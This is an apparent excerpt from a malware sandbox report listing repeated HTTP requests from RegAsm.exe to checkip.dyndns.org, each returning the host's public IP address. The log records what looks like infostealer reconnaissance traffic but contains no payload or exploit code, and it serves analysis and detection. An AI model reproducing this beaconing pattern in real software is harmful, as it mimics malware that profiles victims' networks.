                                                                            Jan 9, 2025 11:39:07.970999956 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:07 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.449890132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:09.587768078 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:10.278358936 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:10 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.449912132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:13.096712112 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:13.789185047 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:13 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.449929132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:15.498500109 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:16.171366930 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:16 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.449946132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:17.882644892 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:18.565743923 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:18 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.449966132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:20.286081076 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:20.958987951 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:20 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.449985132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:23.235824108 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:23.910876036 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.450003132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:25.666357040 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:26.367052078 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:26 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.450020132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:28.159389973 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:28.836218119 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.450031132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:29.804065943 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:30.474419117 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.450041132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:31.237595081 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:31.944452047 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.450059132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:33.441180944 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:34.121165991 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:34 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.450070132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:34.883738041 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:35.576311111 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.450081132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:36.324670076 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:36.997337103 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.450087132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:37.732431889 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:38.416779995 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.450089132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:39.125885010 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:39.833125114 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.450091132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:40.604326963 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:41.299570084 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.450093132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:42.049309015 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:42.722121000 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:42 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.2.450095132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:43.561883926 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:44.263384104 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:39:44.475471020 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            46192.168.2.450097132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:45.129086971 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:45.801570892 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:45 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            47192.168.2.450099132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:46.543747902 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:47.288326025 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:47 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
